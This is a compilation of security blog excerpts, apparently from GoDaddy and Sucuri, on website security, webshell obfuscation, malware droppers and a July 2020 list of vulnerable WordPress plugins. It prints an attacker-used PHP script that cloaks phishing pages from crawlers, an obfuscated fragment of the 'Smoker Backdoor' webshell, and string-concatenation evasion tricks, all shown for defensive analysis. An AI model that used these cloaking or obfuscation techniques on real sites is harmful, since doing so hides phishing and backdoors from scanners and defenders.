Webform security best practices for small businesses

As a small business owner or manager, you are responsible for your customers’ email addresses, phone numbers and billing addresses the second they type the […]

The post Webform security best practices for small businesses appeared first on GoDaddy Blog.

CSAM: A good month to discuss website security with clients

Cybersecurity Awareness Month isn’t a marketing gambit. Now in its 17th year, CSAM is a collab between government agencies and industry leaders, created to raise awareness and provide resources to further a safer internet. People like web designers and developers should look at CSAM as an opportunity to discuss website security with clients.

How to avoid cyberscams during the COVID-19 pandemic

This article was originally published on GoDaddy’s OpenWeStand.org website. The COVID-19 pandemic closed thousands of businesses, left millions without work, and brought about fear and uncertainty […]

The post How to avoid cyberscams during the COVID-19 pandemic appeared first on GoDaddy Blog.

Web Crawler & User Agent Blocking Techniques

This is a simple script that allows hackers to block specific crawlers based on website requests from specific user-agents. Attackers use it when they don’t want certain traffic to be able to load certain content, usually a phishing page or a malicious download.

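if (preg_match('/bot|crawler|spider|facebook|alexa|twitter|curl/i', $_SERVER['HTTP_USER_AGENT'])) {
    // logger() is not defined in this excerpt
    logger("[BOT] {$_SERVER['REQUEST_URI']} - 500");

    // Matching user-agents get a generic server error instead of the page content
    header('HTTP/1.1 500 Internal Server Error');
    exit();
}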

Using preg_match, the script looks for certain known crawler strings in the user-agent.

Continue reading Web Crawler & User Agent Blocking Techniques at Sucuri Blog.

Smoker Backdoor: Evasion Techniques in Webshell Backdoors

“Smoker Backdoor” is a PHP webshell backdoor that uses hexadecimal and decimal obfuscation in conjunction with the PHP function goto to evade detection from malware scanners.

The hexadecimal/decimal obfuscation is clear to see when viewing the file’s PHP code. For instance, this section of the PHP code is obfuscated using this method:

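// "\x72\145\156\x61\155\x65" decodes to "rename"; "\164\x72\x75\x65" decodes to "true"
if ($_GET["\x72\145\156\x61\155\x65"] == "\164\x72\x75\x65") {
    // The echoed string decodes to: <form enctype="multipart/form-data" method="post">
    echo "\x3c\146\157\162\x6d\x20\145\x6e\143\x74\171\x70\145\75\x22\155\165\x6c\164\x69\x70\141\x72\164\57\x66\x6f\162\155\55\x64\141\x74\141\x22\40\155\x65\x74\x68\x6f\144\x3d\42\160\x6f\163\x74\x22\76\xa\x20\40" .
        // "\x66\x69\x6c\145" decodes to "file"
        htmlspecialchars($_GET["\x66\x69\x6c\145"])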

As with many webshells, it allows the user to set a password to control access to the webshell.

Continue reading Smoker Backdoor: Evasion Techniques in Webshell Backdoors at Sucuri Blog.

How SSL Works with a Website Firewall

It’s no secret that a secure sockets layer (SSL) encrypts data as it moves between a visitor’s browser and the site host. For many people, a single SSL appears to be sufficient for protecting data exchanged between visitors and their website.

But what happens to your SSL protection when you add a web application firewall like the Sucuri WAF? Protecting that additional data transit point is a topic we often discuss with customers, and it’s relevant for anyone to understand.

Continue reading How SSL Works with a Website Firewall at Sucuri Blog.

String Concatenation: Obfuscation Techniques

While string concatenation has many valuable applications in development — such as making code more efficient or functions more effective — it is also a popular way for attackers to obfuscate code and try to make it more difficult to detect. Let’s dig into how bad actors are leveraging this technique to conceal their malware.

Avoiding Detection with String Concatenation

String concatenation obfuscation works by using a period between each string, which instructs PHP to join these character strings together and run the result as a single function. For example, 'cr'.'ea'.'te'.'_f'.'un'.'c'.'ti'.'o'.'n'; would become create_function.

Continue reading String Concatenation: Obfuscation Techniques at Sucuri Blog.

PHP Binary Downloader

When possible, an attacker will want to avoid using specific functions in their PHP code that they know are more likely to be flagged by a scanner. Some examples of suspicious functions commonly detected include system and file_put_contents.

In this malware dropper file we recently found on a compromised website, the attacker chose to create a user-defined PHP function getFile to accomplish the same task as file_put_contents.

Continue reading PHP Binary Downloader at Sucuri Blog.

PHP Backdoor Obfuscated One Liner

In the past, I have explained how small one-line PHP backdoors use obfuscation and strings of code in HTTP requests to pass attackers’ commands to backdoors. Today, I’ll highlight another similar injection example and describe some of the malicious behavior we’ve seen recently on compromised websites.

Obfuscated PHP Backdoor

Discovered by our Remediation team, this PHP backdoor variant hides its use of create_function by requiring the attacker to provide it in their request.

Continue reading PHP Backdoor Obfuscated One Liner at Sucuri Blog.

Vulnerabilities Digest: July 2020

Relevant Plugins and Vulnerabilities:

Plugin                          | Vulnerability                 | Patched Version | Installs
--------------------------------+-------------------------------+-----------------+---------
Asset CleanUp: Page Speed       | Authenticated XSS             | 1.4.6.7         | 80000
Quiz And Survey Master          | Authenticated Stored XSS      | 7.0.0           | 30000
Comments – wpDiscuz 7.0.0 –     | Arbitrary File Upload         | 7.0.5           | 70000
Real Estate 7                   | Reflected XSS                 | 3.0.4           | 8000
CarePlus                        | Reflected XSS                 |                 | 5000
WooCommerce Subscriptions       | Unauthenticated Stored XSS    | 2.6.3           | 10000
Careerfy                        | Reflected XSS                 | 4.4.0           | 2300
JobSearch                       | Reflected XSS                 | 1.5.6           | 1300
TC Custom JavaScript            | Unauthenticated Stored XSS    | 1.2.2           | 10000
Email Subscribers & Newsletters | Authenticated SQL injection   | 4.5.1           | 100000
WP-Live Chat by 3CX             | Authenticated Stored XSS      | 8.2.0           | 50000
InJob                           | Reflected XSS                 | 3.4.1           | 1880
Travel Booking                  | Unauthenticated SQL Injection | 2.8.4           | 8000
Travel Booking                  | Unauthenticated XSS           | 2.8.4           | 8000
Monalisa                        | Reflected XSS                 | 2.1.3           | 600
Adning Advertising              | Arbitrary File Upload         | 1.5.6           | 8000
Security & Malware scan         | Security Nonce Leak           | 2.51            | 5000
Testimonials Widget             | Authenticated Stored XSS      |                 | 30000

Highlights for July 2020:

  • Cross-site scripting is still the most common vulnerability in WordPress plugins.

Continue reading Vulnerabilities Digest: July 2020 at Sucuri Blog.